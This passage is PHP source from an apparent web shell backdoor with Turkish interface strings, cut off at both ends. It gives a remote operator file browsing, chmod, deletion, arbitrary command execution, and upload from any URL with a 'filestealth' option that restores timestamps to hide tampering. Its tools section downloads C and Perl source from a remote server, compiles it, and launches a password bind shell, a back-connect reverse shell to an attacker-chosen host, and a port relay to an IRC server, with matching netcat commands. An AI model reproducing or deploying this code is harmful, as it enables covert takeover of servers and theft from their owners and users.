<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
<br><br><input type=submit name=submit value=\"Search\"></form>";
 if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
}
if ($act == "chmod")
{
 $mode = fileperms($d.$f);
 if (!$mode) {echo "<b>Error File Not Changed:</b> Could not change current Value";}
 else
 {
  $form = true;
  if ($chmod_submit)
  {
   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
   if (chmod($d.$f,$octet)) {$act = "ls"; $form = false; $err = "";}
   else {$err = "Can't chmod to ".$octet.".";}
  }
  if ($form)
  {
   $perms = parse_perms($mode);
   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Hata:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Okuma<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Yazma<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">Uygulanamadi!</td><td><b>Grup</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Okuma<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">Uygulanamadi!</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Okuma<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">Uygulanamadi!</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
  }
 }
}
if ($act == "upload")
{
 $uploadmess = "";
 $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
 if (empty($uploadpath)) {$uploadpath = $d;}
 elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
 if (!empty($submit))
 {
  global $HTTP_POST_FILES;
  $uploadfile = $HTTP_POST_FILES["uploadfile"];
  if (!empty($uploadfile["tmp_name"]))
  {
   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
   else {$destin = $userfilename;}
   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Hata Yuklenen Dosya ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
  }
  elseif (!empty($uploadurl))
  {
   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
   else
   {
    $destin = explode("/",$destin);
    $destin = $destin[count($destin)-1];
    if (empty($destin))
    {
     $i = 0;
     $b = "";
     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
   }
   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Yanlis URL!
</b><br>";}
   else
   {
    $st = getmicrotime();
    $content = @file_get_contents($uploadurl);
    $dt = round(getmicrotime()-$st,4);
    if (!$content) {$uploadmess .=  "Dosya Indirelemedi!<br>";}
    else
    {
     if ($filestealth) {$stat = stat($uploadpath.$destin);}
     $fp = fopen($uploadpath.$destin,"w");
     if (!$fp) {$uploadmess .= "Hata: Dosyaya Yazilamadi :( ".htmlspecialchars($destin)."!<br>";}
     else
     {
      fwrite($fp,$content,strlen($content));
      fclose($fp);
      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
     }
    }
   }
  }
 }
 if ($miniform)
 {
  echo "<b>".$uploadmess."</b>";
  $act = "ls";
 }
 else
 {
  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
File-name (auto-fill): <input name=uploadfilename size=25><br><br>
<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
<input type=submit name=submit value=\"Upload(Yukle)\">
</form>";
 }
}
if ($act == "delete")
{
 $delerr = "";
 foreach ($actbox as $v)
 {
  $result = false;
  $result = fs_rmobj($v);
  if (!$result) {$delerr .= "Silinemedi! ".htmlspecialchars($v)."<br>";}
 }
 if (!empty($delerr)) {echo "<b>Hatalari Sil(s):</b><br>".$delerr;}
 $act = "ls";
}
if (!$usefsbuff)
{
 if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Buffer Path because it's closed!!! \"\$useFSbuff\" True;)</center>";}
}
else
{
 if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ash_sess_put($sess_data); $act = "ls"; }
 elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ash_sess_put($sess_data); $act = "ls";}
 elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} ash_sess_put($sess_data); $act = "ls";}
 if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ash_sess_put($sess_data);}
 elseif ($actpastebuff)
 {
  $psterr = "";
  foreach($sess_data["copy"] as $k=>$v)
  {
   $to = $d.basename($v);
   if (!fs_copy_obj($v,$to)) {$psterr .= "Could not copy!! ".$v." to ".$to."!<br>";}
   if ($copy_unset) {unset($sess_data["copy"][$k]);}
  }
  foreach($sess_data["cut"] as $k=>$v)
  {
   $to = $d.basename($v);
   if (!fs_move_obj($v,$to)) {$psterr .= "Could not paste!! ".$v." to ".$to."!<br>";}
   unset($sess_data["cut"][$k]);
  }
  ash_sess_put($sess_data);
  if (!empty($psterr)) {echo "<b>Paste Error (S):</b><br>".$psterr;}
  $act = "ls";
 }
 elseif ($actarcbuff)
 {
  $arcerr = "";
  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
  else {$ext = ".tar.gz";}
  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
  $cmdline .= " ".$actarcbuff_path;
  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  foreach($objects as $v)
  {
   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
   if (is_dir($v))
   {
    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
    $v .= "*";
   }
   $cmdline .= " ".$v;
  }
  $tmp = realpath(".");
  chdir($d);
  $ret = myshellexec($cmdline);
  chdir($tmp);
  if (empty($ret)) {$arcerr .= "Unable to Search Archive (Error:3) (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
  $ret = str_replace("\r\n","\n",$ret);
  $ret = explode("\n",$ret);
  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
  foreach($sess_data["cut"] as $k=>$v)
  {
   if (in_array($v,$ret)) {fs_rmobj($v);}
   unset($sess_data["cut"][$k]);
  }
  ash_sess_put($sess_data);
  if (!empty($arcerr)) {echo "<b>Archiver Error:</b><br>".$arcerr;}
  $act = "ls";
 }
 elseif ($actpastebuff)
 {
  $psterr = "";
  foreach($sess_data["copy"] as $k=>$v)
  {
   $to = $d.basename($v);
   if (!fs_copy_obj($v,$d)) {$psterr .= "Could not copy!! ".$v." to ".$to."!<br>";}
   if ($copy_unset) {unset($sess_data["copy"][$k]);}
  }
  foreach($sess_data["cut"] as $k=>$v)
  {
   $to = $d.basename($v);
   if (!fs_move_obj($v,$d)) {$psterr .= "Could not paste! ".$v." to ".$to."!<br>";}
   unset($sess_data["cut"][$k]);
  }
  ash_sess_put($sess_data);
  if (!empty($psterr)) {echo "<b>Paste Error:</b><br>".$psterr;}
  $act = "ls";
 }
}
if ($act == "cmd")
{
if (trim($cmd) == "ps -aux") {$act = "processes";}
elseif (trim($cmd) == "tasklist") {$act = "processes";}
else
{
 @chdir($chdir);
 if (!empty($submit))
 {
  echo "<b>Results of the Application</b>:<br>";
  $olddir = realpath(".");
  @chdir($d);
  $ret = myshellexec($cmd);
  $ret = convert_cyr_string($ret,"d","w");
  if ($cmd_txt)
  {
   $rows = count(explode("\r\n",$ret))+1;
   if ($rows < 10) {$rows = 10;}
   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  }
  else {echo $ret."<br>";}
  @chdir($olddir);
 }
 else {echo "<b>Uygulama Yonet </b>"; if (empty($cmd_txt)) {$cmd_txt = true;}}
 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"OK\">&nbsp;Show text in Field&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
}
}
if ($act == "ls")
{
 if (count($ls_arr) > 0) {$list = $ls_arr;}
 else
 {
  $list = array();
  if ($h = @opendir($d))
  {
   while (($o = readdir($h)) !== false) {$list[] = $d.$o;}
   closedir($h);
  }
  else {}
 }
 if (count($list) == 0) {echo "<center><b>Unable to Open Folder. (".htmlspecialchars($d).")!</b></center>";}
 else
 {
  //Building array
  $objects = array();
  $vd = "f"; //Viewing mode
  if ($vd == "f")
  {
   $objects["head"] = array();
   $objects["folders"] = array();
   $objects["links"] = array();
   $objects["files"] = array();
   foreach ($list as $v)
   {
    $o = basename($v);
    $row = array();
    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
    elseif (is_dir($v))
    {
     if (is_link($v)) {$type = "LINK";}
     else {$type = "DIR";}
     $row[] = $v;
     $row[] = $type;
    }
    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
    $row[] = filemtime($v);
    if (!$win)
    {
     $ow = posix_getpwuid(fileowner($v));
     $gr = posix_getgrgid(filegroup($v));
     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
    }
    $row[] = fileperms($v);
    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
    elseif (is_link($v)) {$objects["links"][] = $row;}
    elseif (is_dir($v)) {$objects["folders"][] = $row;}
    elseif (is_file($v)) {$objects["files"][] = $row;}
    $i++;
   }
   $row = array();
   $row[] = "<b>Name</b>";
   $row[] = "<b>Dimension</b>";
   $row[] = "<b>Changing</b>";
   if (!$win)
  {$row[] = "<b>Owner/Grup</b>";}
   $row[] = "<b>Permissions(Authority)</b>";
   $row[] = "<b>attribute</b>";
   $parsesort = parsesort($sort);
   $sort = $parsesort[0].$parsesort[1];
   $k = $parsesort[0];
   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
   $row[$k] .= $y;
   for($i=0;$i<count($row)-1;$i++)
   {
    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
   }
   $v = $parsesort[0];
   usort($objects["folders"], "tabsort");
   usort($objects["links"], "tabsort");
   usort($objects["files"], "tabsort");
   if ($parsesort[1] == "d")
   {
    $objects["folders"] = array_reverse($objects["folders"]);
    $objects["files"] = array_reverse($objects["files"]);
   }
   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
   $tab = array();
   $tab["cols"] = array($row);
   $tab["head"] = array();
   $tab["folders"] = array();
   $tab["links"] = array();
   $tab["files"] = array();
   $i = 0;
   foreach ($objects as $a)
   {
    $v = $a[0];
    $o = basename($v);
    $dir = dirname($v);
    if ($disp_fullpath) {$disppath = $v;}
    else {$disppath = $o;}
    $disppath = str2mini($disppath,60);
    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
    foreach ($regxp_highlight as $r)
    {
     if (strstr($o,$r[0]))
     {
      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Error in configuration \$regxp_highlight[".$k."][0] - Unknown Command."; ashshexit();}
      else
      {
       $r[1] = round($r[1]);
       $isdir = is_dir($v);
       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
       {
        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
        $disppath = $r[2].$disppath.$r[3];
        if ($r[4]) {break;}
       }
      }
     }
    }
    $uo = urlencode($o);
    $ud = urlencode($dir);
    $uv = urlencode($v);
    $row = array();
    if ($o == ".")
    {
     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
     $row[] = "LINK";
    }
    elseif ($o == "..")
    {
     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
     $row[] = "LINK";
    }
    elseif (is_dir($v))
    {
     if (is_link($v))
     {
      $disppath .= " => ".readlink($v);
      $type = "LINK";
      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
     }
     else
     {
      $type = "DIR";
      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
      }
     $row[] = $type;
    }
    elseif(is_file($v))
    {
     $ext = explode(".",$o);
     $c = count($ext)-1;
     $ext = $ext[$c];
     $ext = strtolower($ext);
     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
     $row[] = view_size($a[1]);
    }
    $row[] = date("d.m.Y H:i:s",$a[2]);
    if (!$win) {$row[] = $a[3];}
    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Bilgi\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Bilgi\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Degistir\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Indir\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
    elseif (is_link($v)) {$tab["links"][] = $row;}
    elseif (is_dir($v)) {$tab["folders"][] = $row;}
    elseif (is_file($v)) {$tab["files"][] = $row;}
    $i++;
   }
  }
  //Compiling table
  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
  echo "<center><b>Listelenen (".count($tab["files"])." dosya ve ".(count($tab["folders"])+count($tab["links"]))." klasor):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
  foreach($table as $row)
  {
   echo "<tr>\r\n";
   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
   echo "</tr>\r\n";
  }
  echo "</table><hr size=\"1\" noshade><p align=\"right\">
  <script>
  function ls_setcheckboxall(status)
  {
   var id = 0;
   var num = ".(count($table)-2).";
   while (id <= num)
   {
    document.getElementById('actbox'+id).checked = status;
    id++;
   }
  }
  function ls_reverse_all()
  {
   var id = 0;
   var num = ".(count($table)-2).";
   while (id <= num)
   {
    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
    id++;
   }
  }
  </script>
  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Select all(ME)\"> 
  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
  {
   echo "<input type=submit name=actarcbuff value=\"Pack preserves the archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Yapistir\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Bos tampon\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  }
  echo "<select name=act><option value=\"".$act."\">(Choose):</option>";
  echo "<option value=delete".($dspact == "delete"?" selected":"").">delete</option>";
  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change Mode</option>";
  if ($usefsbuff)
  {
   echo "<option value=cut".($dspact == "cut"?" selected":"").">CUT</option>";
   echo "<option value=copy".($dspact == "copy"?" selected":"").">COPY</option>";
   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">SELECT(Unselect)</option>";
  }
  echo "</select>&nbsp;<input type=submit value=\"OK!\"></p>";
  echo "</form>";
 }
}
if ($act == "tools")
{
 $bndportsrcs = array(
  "ashsh_bindport.pl"=>array("Use PERL","perl %path %port"),
  "ashsh_bindport.c"=>array("Use C","%path %port %pass")
 );
 $bcsrcs = array(
  "ashsh_backconn.pl"=>array("Use PERL","perl %path %host %port"),
  "ashsh_backconn.c"=>array("Use C","%path %host %port")
 );
 $dpsrcs = array(
  "ashsh_datapipe.pl"=>array("Use PERL","perl %path %localport %remotehost %remoteport"),
  "ashsh_datapipe.c"=>array("Use C","%path %localport %remoteport %remotehost")
 );
 if (!is_array($bind)) {$bind = array();}
 if (!is_array($bc)) {$bc = array();}
 if (!is_array($datapipe)) {$datapipe = array();}
 
 if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
 if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
  
 if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
 if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
 
 if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
 if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
 if (!empty($bindsubmit))
 {
  echo "<b>Port Connection result:</b><br>";
  $v = $bndportsrcs[$bind["src"]];
  if (empty($v)) {echo "Unknown file!<br>";}
  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port is in use, choose another port!<br>";}
  else
  {
   $w = explode(".",$bind["src"]);
   $ext = $w[count($w)-1];
   unset($w[count($w)-1]);
   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
   $binpath = $tmpdir.join(".",$w).rand(0,999);
   if ($ext == "pl") {$binpath = $srcpath;}
   @unlink($srcpath);
   $fp = fopen($srcpath,"ab+");
   if (!$fp) {echo "Could Not Write To Source Code--> \"".$srcpath."\"!<br>";}
   elseif (!$data = ashgetsource($bind["src"])) {echo "Source Code Download Failed!";}
   else
   {
    fwrite($fp,$data,strlen($data));
    fclose($fp);
    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
    $v[1] = str_replace("%path",$binpath,$v[1]);
    $v[1] = str_replace("%port",$bind["port"],$v[1]);
    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
    $v[1] = str_replace("//","/",$v[1]);
    $retbind = myshellexec($v[1]." > /dev/null &");
    sleep(5);
    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
    if (!$sock) {echo "Failed to connect to localhost :".$bind["port"]."! I'm Considering Checking Your Firewall";}
    else {echo "Connecting.......OK! Connected..--> <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>!NetCat'i use..\"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>see the bindings!!</u></a></center>";}
   }
   echo "<br>";
  }
 }
 if (!empty($bcsubmit))
 {
  echo "<b>Old Link Results:</b><br>";
  $v = $bcsrcs[$bc["src"]];
  if (empty($v)) {echo "Unknown file!<br>";}
  else
  {
   $w = explode(".",$bc["src"]);
   $ext = $w[count($w)-1];
   unset($w[count($w)-1]);
   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
   $binpath = $tmpdir.join(".",$w).rand(0,999);
   if ($ext == "pl") {$binpath = $srcpath;}
   @unlink($srcpath);
   $fp = fopen($srcpath,"ab+");
   if (!$fp) {echo "Could Not Write To Source Code ---> \"".$srcpath."\"!<br>";}
   elseif (!$data = ashgetsource($bc["src"])) {echo "Source Code could not be downloaded!!!!";}
   else
   {
    fwrite($fp,$data,strlen($data));
    fclose($fp);
    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
    $v[1] = str_replace("%path",$binpath,$v[1]);
    $v[1] = str_replace("%host",$bc["host"],$v[1]);
    $v[1] = str_replace("%port",$bc["port"],$v[1]);
    $v[1] = str_replace("//","/",$v[1]);
    $retbind = myshellexec($v[1]." > /dev/null &");
    echo "Current Script try again ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
   }
  }
 }
 if (!empty($dpsubmit))
 {
  echo "<b>Datapipe Results:</b><br>";
  $v = $dpsrcs[$datapipe["src"]];
  if (empty($v)) {echo "Unknown File!<br>";}
  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port in use Select another port!<br>";}
  else
  {
   $srcpath = $tmpdir.$datapipe["src"];
   $w = explode(".",$datapipe["src"]);
   $ext = $w[count($w)-1];
   unset($w[count($w)-1]);
   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
   $binpath = $tmpdir.join(".",$w).rand(0,999);
   if ($ext == "pl") {$binpath = $srcpath;}
   @unlink($srcpath);
   $fp = fopen($srcpath,"ab+");
   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
   elseif (!$data = ashgetsource($datapipe["src"])) {echo "Source Code could not be downloaded!";}
   else
   {
    fwrite($fp,$data,strlen($data));
    fclose($fp);
    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
    $v[1] = str_replace("%path",$binpath,$v[1]);
    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
    $v[1] = str_replace("//","/",$v[1]);
    $retbind = myshellexec($v[1]." > /dev/null &");
    sleep(5);
    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
    if (!$sock) {echo "Could not connect localhost'a:".$datapipe["localport"]."! I think you need to Check your Firewall.";}
    else {echo "Connecting datapipe... OK Connected<b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you're hooked on it all ".$datapipe["remoteaddr"]."</b>! You are using NetCat, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>see datapipe</u></a></center>";}
   }
   echo "<br>";
  }
 }
 ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
 foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
 ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
<b>Back Link:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> The source code has been downloaded from the Remote Server.<?php
}
if ($act == "processes")
{
 echo "<b>Processes:</b><br>";
 if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
 else {$handler = "tasklist";}
 $ret = myshellexec($handler);
 if (!$ret) {echo "Not Applied \"".$handler."\"!";}
 else
 {
  if (empty($processes_sort)) {$processes_sort = $sort_default;}
